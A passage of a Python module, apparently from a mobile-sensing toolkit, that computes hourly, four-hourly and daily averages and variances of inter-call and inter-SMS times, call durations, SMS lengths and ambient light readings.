    return [DataPoint(start_time=day_start, end_time=day_end, offset=events[0].offset,
                      sample=np.var(self.inter_event_time_list(events)))]
def variance_inter_phone_call_sms_time_hourly(self, phonedata: List[DataPoint], smsdata: List[DataPoint])\
        ->List[DataPoint]:
    """
    Variance of time (in minutes) between two consecutive events (call and
    sms) for each one-hour window of the day. Windows with fewer than two
    events yield no DataPoint.

    :param List(DataPoint) phonedata: Phone call DataStream
    :param List(DataPoint) smsdata: SMS DataStream
    :return: Variances of inter-phone call and sms time over 1 hour windows
    :rtype: List(DataPoint) or None
    """
    if len(phonedata) + len(smsdata) <= 1:
        return None
    # Calls span their duration (sample is seconds); SMS are instantaneous.
    for call in phonedata:
        call.end_time = call.start_time + datetime.timedelta(seconds=call.sample)
    for msg in smsdata:
        msg.end_time = msg.start_time
    events = sorted(phonedata + smsdata, key=lambda ev: ev.start_time)
    midnight = copy.deepcopy(events[0].start_time).replace(hour=0, minute=0, second=0, microsecond=0)
    variances = []
    for hour in range(24):
        win_start = midnight.replace(hour=hour)
        win_end = win_start + datetime.timedelta(minutes=59)
        in_window = [ev for ev in events
                     if win_start <= ev.start_time <= win_end
                     or win_start <= ev.end_time <= win_end]
        if len(in_window) > 1:
            variances.append(DataPoint(start_time=win_start, end_time=win_end,
                                       offset=events[0].offset,
                                       sample=np.var(self.inter_event_time_list(in_window))))
    return variances
def variance_inter_phone_call_sms_time_four_hourly(self, phonedata: List[DataPoint], smsdata: List[DataPoint])\
        ->List[DataPoint]:
    """
    Variance of time (in minutes) between two consecutive events (call and
    sms) for each four-hour window of the day. Windows with fewer than two
    events yield no DataPoint.

    :param List(DataPoint) phonedata: Phone call DataStream
    :param List(DataPoint) smsdata: SMS DataStream
    :return: Variances of inter-phone call and sms time over 4 hour windows
    :rtype: List(DataPoint) or None
    """
    if len(phonedata) + len(smsdata) <= 1:
        return None
    # Calls span their duration (sample is seconds); SMS are instantaneous.
    for call in phonedata:
        call.end_time = call.start_time + datetime.timedelta(seconds=call.sample)
    for msg in smsdata:
        msg.end_time = msg.start_time
    events = sorted(phonedata + smsdata, key=lambda ev: ev.start_time)
    midnight = copy.deepcopy(events[0].start_time).replace(hour=0, minute=0, second=0, microsecond=0)
    variances = []
    for hour in range(0, 24, 4):
        win_start = midnight.replace(hour=hour)
        win_end = win_start + datetime.timedelta(hours=3, minutes=59)
        in_window = [ev for ev in events
                     if win_start <= ev.start_time <= win_end
                     or win_start <= ev.end_time <= win_end]
        if len(in_window) > 1:
            variances.append(DataPoint(start_time=win_start, end_time=win_end,
                                       offset=events[0].offset,
                                       sample=np.var(self.inter_event_time_list(in_window))))
    return variances
def average_inter_phone_call_time_hourly(self, phonedata: List[DataPoint])->List[DataPoint]:
    """
    Average time (in minutes) between two consecutive calls for each hour
    window. Windows with fewer than two calls yield no DataPoint.

    :param List(DataPoint) phonedata: Phone call DataStream
    :return: Average inter-phone call time over 1 hour windows
    :rtype: List(DataPoint) or None
    """
    if len(phonedata) <= 1:
        return None
    calls = phonedata
    # A call spans start_time plus its duration (sample is seconds).
    for call in calls:
        call.end_time = call.start_time + datetime.timedelta(seconds=call.sample)
    midnight = copy.deepcopy(calls[0].start_time).replace(hour=0, minute=0, second=0, microsecond=0)
    averages = []
    for hour in range(24):
        win_start = midnight.replace(hour=hour)
        win_end = win_start + datetime.timedelta(minutes=59)
        in_window = [c for c in calls
                     if win_start <= c.start_time <= win_end
                     or win_start <= c.end_time <= win_end]
        if len(in_window) > 1:
            gaps = self.inter_event_time_list(in_window)
            averages.append(DataPoint(start_time=win_start, end_time=win_end,
                                      offset=calls[0].offset,
                                      sample=sum(gaps) / (len(in_window) - 1)))
    return averages
def average_inter_phone_call_time_four_hourly(self, phonedata: List[DataPoint])->List[DataPoint]:
    """
    Average time (in minutes) between two consecutive calls for each
    four-hour window. Windows with fewer than two calls yield no DataPoint.

    :param List(DataPoint) phonedata: Phone call DataStream
    :return: Average inter-phone call time over 4 hour windows
    :rtype: List(DataPoint) or None
    """
    if len(phonedata) <= 1:
        return None
    calls = phonedata
    # A call spans start_time plus its duration (sample is seconds).
    for call in calls:
        call.end_time = call.start_time + datetime.timedelta(seconds=call.sample)
    midnight = copy.deepcopy(calls[0].start_time).replace(hour=0, minute=0, second=0, microsecond=0)
    averages = []
    for hour in range(0, 24, 4):
        win_start = midnight.replace(hour=hour)
        win_end = win_start + datetime.timedelta(hours=3, minutes=59)
        in_window = [c for c in calls
                     if win_start <= c.start_time <= win_end
                     or win_start <= c.end_time <= win_end]
        if len(in_window) > 1:
            gaps = self.inter_event_time_list(in_window)
            averages.append(DataPoint(start_time=win_start, end_time=win_end,
                                      offset=calls[0].offset,
                                      sample=sum(gaps) / (len(in_window) - 1)))
    return averages
def average_inter_phone_call_time_daily(self, phonedata: List[DataPoint])->List[DataPoint]:
    """
    Average time (in minutes) between two consecutive calls over a whole day.
    Returns None when fewer than two calls exist.

    :param List(DataPoint) phonedata: Phone call DataStream
    :return: Average inter-phone call time over 1 day window
    :rtype: List(DataPoint) or None
    """
    if len(phonedata) <= 1:
        return None
    calls = phonedata
    # A call spans start_time plus its duration (sample is seconds).
    for call in calls:
        call.end_time = call.start_time + datetime.timedelta(seconds=call.sample)
    first = calls[0].start_time
    day_start = datetime.datetime(year=first.year, month=first.month,
                                  day=first.day, tzinfo=first.tzinfo)
    day_end = day_start + datetime.timedelta(hours=23, minutes=59)
    mean_gap = sum(self.inter_event_time_list(calls)) / (len(calls) - 1)
    return [DataPoint(start_time=day_start, end_time=day_end,
                      offset=calls[0].offset, sample=mean_gap)]
def variance_inter_phone_call_time_hourly(self, phonedata: List[DataPoint])->List[DataPoint]:
    """
    Variance of time (in minutes) between two consecutive calls for each hour
    window. Windows with fewer than two calls yield no DataPoint.

    :param List(DataPoint) phonedata: Phone call DataStream
    :return: Variance of inter-phone call time over 1 hour windows
    :rtype: List(DataPoint) or None
    """
    if len(phonedata) <= 1:
        return None
    calls = phonedata
    # A call spans start_time plus its duration (sample is seconds).
    for call in calls:
        call.end_time = call.start_time + datetime.timedelta(seconds=call.sample)
    midnight = copy.deepcopy(calls[0].start_time).replace(hour=0, minute=0, second=0, microsecond=0)
    variances = []
    for hour in range(24):
        win_start = midnight.replace(hour=hour)
        win_end = win_start + datetime.timedelta(minutes=59)
        in_window = [c for c in calls
                     if win_start <= c.start_time <= win_end
                     or win_start <= c.end_time <= win_end]
        if len(in_window) > 1:
            variances.append(DataPoint(start_time=win_start, end_time=win_end,
                                       offset=calls[0].offset,
                                       sample=np.var(self.inter_event_time_list(in_window))))
    return variances
def variance_inter_phone_call_time_four_hourly(self, phonedata: List[DataPoint])->List[DataPoint]:
    """
    Variance of time (in minutes) between two consecutive calls for each
    four-hour window. Windows with fewer than two calls yield no DataPoint.

    :param List(DataPoint) phonedata: Phone call DataStream
    :return: Variance of inter-phone call time over 4 hour windows
    :rtype: List(DataPoint) or None
    """
    if len(phonedata) <= 1:
        return None
    calls = phonedata
    # A call spans start_time plus its duration (sample is seconds).
    for call in calls:
        call.end_time = call.start_time + datetime.timedelta(seconds=call.sample)
    midnight = copy.deepcopy(calls[0].start_time).replace(hour=0, minute=0, second=0, microsecond=0)
    variances = []
    for hour in range(0, 24, 4):
        win_start = midnight.replace(hour=hour)
        win_end = win_start + datetime.timedelta(hours=3, minutes=59)
        in_window = [c for c in calls
                     if win_start <= c.start_time <= win_end
                     or win_start <= c.end_time <= win_end]
        if len(in_window) > 1:
            variances.append(DataPoint(start_time=win_start, end_time=win_end,
                                       offset=calls[0].offset,
                                       sample=np.var(self.inter_event_time_list(in_window))))
    return variances
def variance_inter_phone_call_time_daily(self, phonedata: List[DataPoint]) -> List[DataPoint]:
    """
    Variance of time (in minutes) between two consecutive calls over a whole
    day. Returns None when fewer than two calls exist.

    :param List(DataPoint) phonedata: Phone call DataStream
    :return: Variance of inter-phone call time over 1 day windows
    :rtype: List(DataPoint) or None
    """
    if len(phonedata) <= 1:
        return None
    calls = phonedata
    # A call spans start_time plus its duration (sample is seconds).
    for call in calls:
        call.end_time = call.start_time + datetime.timedelta(seconds=call.sample)
    first = calls[0].start_time
    day_start = datetime.datetime(year=first.year, month=first.month,
                                  day=first.day, tzinfo=first.tzinfo)
    day_end = day_start + datetime.timedelta(hours=23, minutes=59)
    return [DataPoint(start_time=day_start, end_time=day_end, offset=calls[0].offset,
                      sample=np.var(self.inter_event_time_list(calls)))]
def average_inter_sms_time_hourly(self, smsdata: List[DataPoint]) -> List[DataPoint]:
    """
    Average time (in minutes) between two consecutive sms for each hour window.
    If there is not enough data for a window then there will be no data point for that window.

    :param List(DataPoint) smsdata: SMS DataStream
    :return: Average inter-sms time over 1 hour windows
    :rtype: List(DataPoint) or None
    """
    if len(smsdata) <= 1:
        return None
    combined_data = smsdata
    # BUG FIX: an SMS is an instantaneous event; its `sample` is the message
    # length, not a duration. The *_inter_phone_call_sms_* siblings set
    # end_time = start_time for SMS; the original added
    # timedelta(seconds=sample) here, skewing the gaps.
    for s in combined_data:
        s.end_time = s.start_time
    new_data = []
    tmp_time = copy.deepcopy(combined_data[0].start_time)
    tmp_time = tmp_time.replace(hour=0, minute=0, second=0, microsecond=0)
    for h in range(0, 24):
        start = tmp_time.replace(hour=h)
        end = start + datetime.timedelta(minutes=59)
        datalist = [d for d in combined_data
                    if start <= d.start_time <= end or start <= d.end_time <= end]
        if len(datalist) <= 1:
            continue
        new_data.append(DataPoint(start_time=start, end_time=end, offset=combined_data[0].offset,
                                  sample=sum(self.inter_event_time_list(datalist)) / (len(datalist) - 1)))
    return new_data
def average_inter_sms_time_four_hourly(self, smsdata: List[DataPoint]) -> List[DataPoint]:
    """
    Average time (in minutes) between two consecutive sms for each four hour window.
    If there is not enough data for a window then there will be no data point for that window.

    :param List(DataPoint) smsdata: SMS DataStream
    :return: Average inter-sms time over 4 hour windows
    :rtype: List(DataPoint) or None
    """
    if len(smsdata) <= 1:
        return None
    combined_data = smsdata
    # BUG FIX: an SMS is an instantaneous event; its `sample` is the message
    # length, not a duration. Match the *_inter_phone_call_sms_* siblings,
    # which set end_time = start_time for SMS.
    for s in combined_data:
        s.end_time = s.start_time
    new_data = []
    tmp_time = copy.deepcopy(combined_data[0].start_time)
    tmp_time = tmp_time.replace(hour=0, minute=0, second=0, microsecond=0)
    for h in range(0, 24, 4):
        start = tmp_time.replace(hour=h)
        end = start + datetime.timedelta(hours=3, minutes=59)
        datalist = [d for d in combined_data
                    if start <= d.start_time <= end or start <= d.end_time <= end]
        if len(datalist) <= 1:
            continue
        new_data.append(DataPoint(start_time=start, end_time=end, offset=combined_data[0].offset,
                                  sample=sum(self.inter_event_time_list(datalist)) / (len(datalist) - 1)))
    return new_data
def average_inter_sms_time_daily(self, smsdata: List[DataPoint]) -> List[DataPoint]:
    """
    Average time (in minutes) between two consecutive sms for a day.
    If there is not enough data for the day then it will return None.

    :param List(DataPoint) smsdata: SMS DataStream
    :return: Average inter-sms time over 1 day windows
    :rtype: List(DataPoint) or None
    """
    if len(smsdata) <= 1:
        return None
    combined_data = smsdata
    # BUG FIX: an SMS is an instantaneous event; its `sample` is the message
    # length, not a duration. Match the *_inter_phone_call_sms_* siblings,
    # which set end_time = start_time for SMS.
    for s in combined_data:
        s.end_time = s.start_time
    start_time = datetime.datetime(year=combined_data[0].start_time.year, month=combined_data[0].start_time.month,
                                   day=combined_data[0].start_time.day, tzinfo=combined_data[0].start_time.tzinfo)
    end_time = start_time + datetime.timedelta(hours=23, minutes=59)
    new_data = [DataPoint(start_time=start_time, end_time=end_time, offset=combined_data[0].offset,
                          sample=sum(self.inter_event_time_list(combined_data)) / (len(combined_data) - 1))]
    return new_data
def variance_inter_sms_time_hourly(self, smsdata: List[DataPoint]) -> List[DataPoint]:
    """
    Variance of time (in minutes) between two consecutive sms for each hour window.
    If there is not enough data for a window then there will be no data point for that window.

    :param List(DataPoint) smsdata: SMS DataStream
    :return: Variance of inter-sms time over 1 hour windows
    :rtype: List(DataPoint) or None
    """
    if len(smsdata) <= 1:
        return None
    combined_data = smsdata
    # BUG FIX: an SMS is an instantaneous event; its `sample` is the message
    # length, not a duration. Match the *_inter_phone_call_sms_* siblings,
    # which set end_time = start_time for SMS.
    for s in combined_data:
        s.end_time = s.start_time
    new_data = []
    tmp_time = copy.deepcopy(combined_data[0].start_time)
    tmp_time = tmp_time.replace(hour=0, minute=0, second=0, microsecond=0)
    for h in range(0, 24):
        start = tmp_time.replace(hour=h)
        end = start + datetime.timedelta(minutes=59)
        datalist = [d for d in combined_data
                    if start <= d.start_time <= end or start <= d.end_time <= end]
        if len(datalist) <= 1:
            continue
        new_data.append(DataPoint(start_time=start, end_time=end, offset=combined_data[0].offset,
                                  sample=np.var(self.inter_event_time_list(datalist))))
    return new_data
def variance_inter_sms_time_four_hourly(self, smsdata: List[DataPoint]) -> List[DataPoint]:
    """
    Variance of time (in minutes) between two consecutive sms for each four hour window.
    If there is not enough data for a window then there will be no data point for that window.

    :param List(DataPoint) smsdata: SMS DataStream
    :return: Variance of inter-sms time over 4 hour windows
    :rtype: List(DataPoint) or None
    """
    if len(smsdata) <= 1:
        return None
    combined_data = smsdata
    # BUG FIX: an SMS is an instantaneous event; its `sample` is the message
    # length, not a duration. Match the *_inter_phone_call_sms_* siblings,
    # which set end_time = start_time for SMS.
    for s in combined_data:
        s.end_time = s.start_time
    new_data = []
    tmp_time = copy.deepcopy(combined_data[0].start_time)
    tmp_time = tmp_time.replace(hour=0, minute=0, second=0, microsecond=0)
    for h in range(0, 24, 4):
        start = tmp_time.replace(hour=h)
        end = start + datetime.timedelta(hours=3, minutes=59)
        datalist = [d for d in combined_data
                    if start <= d.start_time <= end or start <= d.end_time <= end]
        if len(datalist) <= 1:
            continue
        new_data.append(DataPoint(start_time=start, end_time=end, offset=combined_data[0].offset,
                                  sample=np.var(self.inter_event_time_list(datalist))))
    return new_data
def variance_inter_sms_time_daily(self, smsdata: List[DataPoint]) -> List[DataPoint]:
    """
    Variance of time (in minutes) between two consecutive sms for a day.
    If there is not enough data for that day, then it will return None.

    :param List(DataPoint) smsdata: SMS DataStream
    :return: Variance of inter-sms time over 1 daily windows
    :rtype: List(DataPoint) or None
    """
    if len(smsdata) <= 1:
        return None
    combined_data = smsdata
    # BUG FIX: an SMS is an instantaneous event; its `sample` is the message
    # length, not a duration. Match the *_inter_phone_call_sms_* siblings,
    # which set end_time = start_time for SMS.
    for s in combined_data:
        s.end_time = s.start_time
    start_time = datetime.datetime(year=combined_data[0].start_time.year, month=combined_data[0].start_time.month,
                                   day=combined_data[0].start_time.day, tzinfo=combined_data[0].start_time.tzinfo)
    end_time = start_time + datetime.timedelta(hours=23, minutes=59)
    new_data = [DataPoint(start_time=start_time, end_time=end_time, offset=combined_data[0].offset,
                          sample=np.var(self.inter_event_time_list(combined_data)))]
    return new_data
def average_call_duration_daily(self, phonedata: List[DataPoint]) -> List[DataPoint]:
    """
    Average call duration over one whole day (units follow the input
    `sample` values; they are seconds elsewhere in this class — confirm).
    Returns None when there is no data.

    :param List(DataPoint) phonedata: Phone call DataStream
    :return: Average call duration over 1 day windows
    :rtype: List(DataPoint) or None
    """
    if not phonedata:
        return None
    first = phonedata[0].start_time
    day_start = datetime.datetime.combine(first.date(), datetime.datetime.min.time())
    day_start = day_start.replace(tzinfo=first.tzinfo)
    day_end = day_start + datetime.timedelta(hours=23, minutes=59)
    mean_duration = sum(call.sample for call in phonedata) / len(phonedata)
    return [DataPoint(start_time=day_start, end_time=day_end,
                      offset=phonedata[0].offset, sample=mean_duration)]
def average_call_duration_hourly(self, phonedata: List[DataPoint]) -> List[DataPoint]:
    """
    Average time spent in call for each hour window (units follow the input
    `sample` values, which are treated as seconds here). If there is no data
    for a window then there will be no data point for that window.

    :param List(DataPoint) phonedata: Phone call DataStream
    :return: Average phone call duration over 1 hour windows
    :rtype: List(DataPoint) or None
    """
    if len(phonedata) < 1:
        return None
    data = copy.deepcopy(phonedata)
    # A call spans start_time plus its duration (sample is seconds).
    for s in data:
        s.end_time = s.start_time + datetime.timedelta(seconds=s.sample)
    new_data = []
    tmp_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
    tmp_time = tmp_time.replace(tzinfo=data[0].start_time.tzinfo)
    for h in range(0, 24):
        datalist = []
        start = tmp_time.replace(hour=h)
        end = start + datetime.timedelta(minutes=59)
        for d in data:
            if start <= d.start_time <= end and start <= d.end_time <= end:
                # Call fully inside the window: count the full duration.
                datalist.append(d.sample)
            elif start <= d.start_time <= end:
                # Call starts inside but runs past the window: clip at window end.
                datalist.append((end - d.start_time).total_seconds())
            elif start <= d.end_time <= end:
                # BUG FIX: call started before the window and ends inside it;
                # count the portion inside the window. The original appended
                # (d.start_time - end).total_seconds(), a negative duration.
                datalist.append((d.end_time - start).total_seconds())
        if len(datalist) < 1:
            continue
        new_data.append(DataPoint(start_time=start, end_time=end, offset=data[0].offset,
                                  sample=sum(datalist) / len(datalist)))
    return new_data
def average_call_duration_four_hourly(self, phonedata: List[DataPoint]) -> List[DataPoint]:
    """
    Average time spent in call for each four hour window (units follow the
    input `sample` values, which are treated as seconds here). If there is no
    data for a window then there will be no data point for that window.

    :param List(DataPoint) phonedata: Phone call DataStream
    :return: Average phone call duration over 4 hour windows
    :rtype: List(DataPoint) or None
    """
    if len(phonedata) < 1:
        return None
    data = copy.deepcopy(phonedata)
    # A call spans start_time plus its duration (sample is seconds).
    for s in data:
        s.end_time = s.start_time + datetime.timedelta(seconds=s.sample)
    new_data = []
    tmp_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
    tmp_time = tmp_time.replace(tzinfo=data[0].start_time.tzinfo)
    for h in range(0, 24, 4):
        datalist = []
        start = tmp_time.replace(hour=h)
        end = start + datetime.timedelta(hours=3, minutes=59)
        for d in data:
            if start <= d.start_time <= end and start <= d.end_time <= end:
                # Call fully inside the window: count the full duration.
                datalist.append(d.sample)
            elif start <= d.start_time <= end:
                # Call starts inside but runs past the window: clip at window end.
                datalist.append((end - d.start_time).total_seconds())
            elif start <= d.end_time <= end:
                # BUG FIX: call started before the window and ends inside it;
                # count the portion inside the window. The original appended
                # (d.start_time - end).total_seconds(), a negative duration.
                datalist.append((d.end_time - start).total_seconds())
        if len(datalist) < 1:
            continue
        new_data.append(DataPoint(start_time=start, end_time=end, offset=data[0].offset,
                                  sample=sum(datalist) / len(datalist)))
    return new_data
def average_sms_length_daily(self, smsdata: List[DataPoint]) -> List[DataPoint]:
    """
    Average sms length over one whole day. Returns None when there is no data.

    :param List(DataPoint) smsdata: SMS DataStream
    :return: Average sms length over 1 day windows
    :rtype: List(DataPoint) or None
    """
    if not smsdata:
        return None
    first = smsdata[0].start_time
    day_start = datetime.datetime.combine(first.date(), datetime.datetime.min.time())
    day_start = day_start.replace(tzinfo=first.tzinfo)
    day_end = day_start + datetime.timedelta(hours=23, minutes=59)
    mean_length = sum(msg.sample for msg in smsdata) / len(smsdata)
    return [DataPoint(start_time=day_start, end_time=day_end,
                      offset=smsdata[0].offset, sample=mean_length)]
def average_sms_length_hourly(self, smsdata: List[DataPoint]) -> List[DataPoint]:
    """
    Average sms length for each one-hour window. Windows without any SMS
    yield no DataPoint.

    :param List(DataPoint) smsdata: SMS DataStream
    :return: Average SMS length over 1 hour windows
    :rtype: List(DataPoint) or None
    """
    if not smsdata:
        return None
    day_start = datetime.datetime.combine(smsdata[0].start_time.date(), datetime.datetime.min.time())
    day_start = day_start.replace(tzinfo=smsdata[0].start_time.tzinfo)
    results = []
    for hour in range(24):
        win_start = day_start.replace(hour=hour)
        win_end = win_start + datetime.timedelta(minutes=59)
        lengths = [msg.sample for msg in smsdata if win_start <= msg.start_time <= win_end]
        if lengths:
            results.append(DataPoint(start_time=win_start, end_time=win_end,
                                     offset=smsdata[0].offset,
                                     sample=sum(lengths) / len(lengths)))
    return results
def average_sms_length_four_hourly(self, smsdata: List[DataPoint]) -> List[DataPoint]:
    """
    Average sms length for each four-hour window. Windows without any SMS
    yield no DataPoint.

    :param List(DataPoint) smsdata: SMS DataStream
    :return: Average sms length over 4 hour windows
    :rtype: List(DataPoint) or None
    """
    if not smsdata:
        return None
    day_start = datetime.datetime.combine(smsdata[0].start_time.date(), datetime.datetime.min.time())
    day_start = day_start.replace(tzinfo=smsdata[0].start_time.tzinfo)
    results = []
    for hour in range(0, 24, 4):
        win_start = day_start.replace(hour=hour)
        win_end = win_start + datetime.timedelta(hours=3, minutes=59)
        lengths = [msg.sample for msg in smsdata if win_start <= msg.start_time <= win_end]
        if lengths:
            results.append(DataPoint(start_time=win_start, end_time=win_end,
                                     offset=smsdata[0].offset,
                                     sample=sum(lengths) / len(lengths)))
    return results
def variance_sms_length_daily(self, smsdata: List[DataPoint]) -> List[DataPoint]:
    """
    Variance of sms length over one whole day. Returns None when there is no data.

    :param List(DataPoint) smsdata: SMS DataStream
    :return: Variance of SMS length over 1 day windows
    :rtype: List(DataPoint) or None
    """
    if not smsdata:
        return None
    first = smsdata[0].start_time
    day_start = datetime.datetime.combine(first.date(), datetime.datetime.min.time())
    day_start = day_start.replace(tzinfo=first.tzinfo)
    day_end = day_start + datetime.timedelta(hours=23, minutes=59)
    return [DataPoint(start_time=day_start, end_time=day_end, offset=smsdata[0].offset,
                      sample=np.var([msg.sample for msg in smsdata]))]
def variance_sms_length_hourly(self, smsdata: List[DataPoint]) -> List[DataPoint]:
    """
    Variance of sms length for each one-hour window. Windows without any SMS
    yield no DataPoint.

    :param List(DataPoint) smsdata: SMS DataStream
    :return: Variance of SMS length over 1 hour windows
    :rtype: List(DataPoint) or None
    """
    if not smsdata:
        return None
    day_start = datetime.datetime.combine(smsdata[0].start_time.date(), datetime.datetime.min.time())
    day_start = day_start.replace(tzinfo=smsdata[0].start_time.tzinfo)
    results = []
    for hour in range(24):
        win_start = day_start.replace(hour=hour)
        win_end = win_start + datetime.timedelta(minutes=59)
        lengths = [msg.sample for msg in smsdata if win_start <= msg.start_time <= win_end]
        if lengths:
            results.append(DataPoint(start_time=win_start, end_time=win_end,
                                     offset=smsdata[0].offset,
                                     sample=np.var(lengths)))
    return results
def variance_sms_length_four_hourly(self, smsdata: List[DataPoint])-> List[DataPoint]:
    """
    Variance of sms length for each four-hour window. Windows without any SMS
    yield no DataPoint.

    :param List(DataPoint) smsdata: SMS DataStream
    :return: Variance of SMS length over 4 hour windows
    :rtype: List(DataPoint) or None
    """
    if not smsdata:
        return None
    day_start = datetime.datetime.combine(smsdata[0].start_time.date(), datetime.datetime.min.time())
    day_start = day_start.replace(tzinfo=smsdata[0].start_time.tzinfo)
    results = []
    for hour in range(0, 24, 4):
        win_start = day_start.replace(hour=hour)
        win_end = win_start + datetime.timedelta(hours=3, minutes=59)
        lengths = [msg.sample for msg in smsdata if win_start <= msg.start_time <= win_end]
        if lengths:
            results.append(DataPoint(start_time=win_start, end_time=win_end,
                                     offset=smsdata[0].offset,
                                     sample=np.var(lengths)))
    return results
def variance_call_duration_daily(self, phonedata: List[DataPoint]) -> List[DataPoint]:
    """
    Variance of call duration over one whole day (units follow the input
    `sample` values). Returns None when there is no data.

    :param List(DataPoint) phonedata: Phone call duration DataStream
    :return: Variance of phone call duration over 1 day windows
    :rtype: List(DataPoint) or None
    """
    if not phonedata:
        return None
    first = phonedata[0].start_time
    day_start = datetime.datetime.combine(first.date(), datetime.datetime.min.time())
    day_start = day_start.replace(tzinfo=first.tzinfo)
    day_end = day_start + datetime.timedelta(hours=23, minutes=59)
    return [DataPoint(start_time=day_start, end_time=day_end, offset=phonedata[0].offset,
                      sample=np.var([call.sample for call in phonedata]))]
def variance_call_duration_hourly(self, phonedata: List[DataPoint]) -> List[DataPoint]:
    """
    Variance of call duration for each hour window (units follow the input
    `sample` values, which are treated as seconds here). If there is no data
    for a window then there will be no data point for that window.

    :param List(DataPoint) phonedata: Phone call duration DataStream
    :return: Variance of phone call duration over 1 hour windows
    :rtype: List(DataPoint) or None
    """
    if len(phonedata) < 1:
        return None
    data = copy.deepcopy(phonedata)
    # A call spans start_time plus its duration (sample is seconds).
    for s in data:
        s.end_time = s.start_time + datetime.timedelta(seconds=s.sample)
    new_data = []
    tmp_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
    tmp_time = tmp_time.replace(tzinfo=data[0].start_time.tzinfo)
    for h in range(0, 24):
        datalist = []
        start = tmp_time.replace(hour=h)
        end = start + datetime.timedelta(minutes=59)
        for d in data:
            if start <= d.start_time <= end and start <= d.end_time <= end:
                # Call fully inside the window: count the full duration.
                datalist.append(d.sample)
            elif start <= d.start_time <= end:
                # Call starts inside but runs past the window: clip at window end.
                datalist.append((end - d.start_time).total_seconds())
            elif start <= d.end_time <= end:
                # BUG FIX: call started before the window and ends inside it;
                # count the portion inside the window. The original appended
                # (d.start_time - end).total_seconds(), a negative duration.
                datalist.append((d.end_time - start).total_seconds())
        if len(datalist) < 1:
            continue
        new_data.append(DataPoint(start_time=start, end_time=end, offset=data[0].offset,
                                  sample=np.var(datalist)))
    return new_data
def variance_call_duration_four_hourly(self, phonedata: List[DataPoint]) -> List[DataPoint]:
    """
    Variance of call duration for each four hour window (units follow the
    input `sample` values, which are treated as seconds here). If there is no
    data for a window then there will be no data point for that window.

    :param List(DataPoint) phonedata: Phone call duration DataStream
    :return: Variance of phone call duration over 4 hour windows
    :rtype: List(DataPoint) or None
    """
    if len(phonedata) < 1:
        return None
    data = copy.deepcopy(phonedata)
    # A call spans start_time plus its duration (sample is seconds).
    for s in data:
        s.end_time = s.start_time + datetime.timedelta(seconds=s.sample)
    new_data = []
    tmp_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
    tmp_time = tmp_time.replace(tzinfo=data[0].start_time.tzinfo)
    for h in range(0, 24, 4):
        datalist = []
        start = tmp_time.replace(hour=h)
        end = start + datetime.timedelta(hours=3, minutes=59)
        for d in data:
            if start <= d.start_time <= end and start <= d.end_time <= end:
                # Call fully inside the window: count the full duration.
                datalist.append(d.sample)
            elif start <= d.start_time <= end:
                # Call starts inside but runs past the window: clip at window end.
                datalist.append((end - d.start_time).total_seconds())
            elif start <= d.end_time <= end:
                # BUG FIX: call started before the window and ends inside it;
                # count the portion inside the window. The original appended
                # (d.start_time - end).total_seconds(), a negative duration.
                datalist.append((d.end_time - start).total_seconds())
        if len(datalist) < 1:
            continue
        new_data.append(DataPoint(start_time=start, end_time=end, offset=data[0].offset,
                                  sample=np.var(datalist)))
    return new_data
def average_ambient_light_daily(self, lightdata: List[DataPoint], data_frequency: float=16,
                                minimum_data_percent: float=40) -> List[DataPoint]:
    """
    Average ambient light (in flux) over a whole day.

    Returns None when fewer than minimum_data_percent% (default 40%) of the
    expected samples (data_frequency per second over 24 hours) are present.

    :param List(DataPoint) lightdata: Phone ambient light DataStream
    :param float data_frequency: Expected number of data points per second
    :param float minimum_data_percent: Minimum percent of data that must be available
    :return: Average of ambient light over a 1 day window
    :rtype: List(DataPoint) or None
    """
    required_samples = data_frequency * 24 * 60 * 60 * minimum_data_percent / 100
    if len(lightdata) < required_samples:
        return None
    first = lightdata[0]
    # Midnight of the first sample's day, keeping its timezone.
    day_begin = datetime.datetime.combine(first.start_time.date(), datetime.datetime.min.time())
    day_begin = day_begin.replace(tzinfo=first.start_time.tzinfo)
    day_close = day_begin + datetime.timedelta(hours=23, minutes=59)
    daily_mean = np.mean([point.sample for point in lightdata])
    return [DataPoint(day_begin, day_close, first.offset, daily_mean)]
def average_ambient_light_hourly(self, lightdata: List[DataPoint], data_frequency: float=16,
                                 minimum_data_percent: float=40) -> List[DataPoint]:
    """
    Average ambient light (in flux) for each one hour window of a day.

    Hour windows holding fewer than minimum_data_percent% (default 40%) of the
    expected samples (data_frequency per second over one hour) produce no data point.

    :param List(DataPoint) lightdata: Phone ambient light DataStream
    :param float data_frequency: Expected number of data points per second
    :param float minimum_data_percent: Minimum percent of data that must be available
    :return: Average of ambient light over 1 hour windows
    :rtype: List(DataPoint) or None
    """
    if not lightdata:
        return None
    required_samples = data_frequency * 60 * 60 * minimum_data_percent / 100
    # Midnight of the first sample's day (tz-aware copy).
    midnight = copy.deepcopy(lightdata[0].start_time)
    midnight = midnight.replace(hour=0, minute=0, second=0, microsecond=0)
    stream_offset = lightdata[0].offset
    hourly = []
    for hour in range(24):
        window_start = midnight.replace(hour=hour)
        window_end = window_start + datetime.timedelta(minutes=59)
        samples = [p.sample for p in lightdata
                   if window_start <= p.start_time <= window_end]
        if len(samples) >= required_samples:
            hourly.append(DataPoint(start_time=window_start, end_time=window_end,
                                    offset=stream_offset, sample=np.mean(samples)))
    return hourly
def average_ambient_light_four_hourly(self, lightdata: List[DataPoint], data_frequency: float=16,
                                      minimum_data_percent: float=40) -> List[DataPoint]:
    """
    Average ambient light (in flux) for each four hour window of a day.

    Windows holding fewer than minimum_data_percent% (default 40%) of the expected
    samples (data_frequency per second over four hours) produce no data point.

    :param List(DataPoint) lightdata: Phone ambient light DataStream
    :param float data_frequency: Expected number of data points per second
    :param float minimum_data_percent: Minimum percent of data that must be available
    :return: Average of ambient light over 4 hour windows
    :rtype: List(DataPoint) or None
    """
    if not lightdata:
        return None
    required_samples = data_frequency * 4 * 60 * 60 * minimum_data_percent / 100
    # Midnight of the first sample's day (tz-aware copy).
    midnight = copy.deepcopy(lightdata[0].start_time)
    midnight = midnight.replace(hour=0, minute=0, second=0, microsecond=0)
    stream_offset = lightdata[0].offset
    windows = []
    for hour in range(0, 24, 4):
        window_start = midnight.replace(hour=hour)
        window_end = window_start + datetime.timedelta(hours=3, minutes=59)
        samples = [p.sample for p in lightdata
                   if window_start <= p.start_time <= window_end]
        if len(samples) >= required_samples:
            windows.append(DataPoint(start_time=window_start, end_time=window_end,
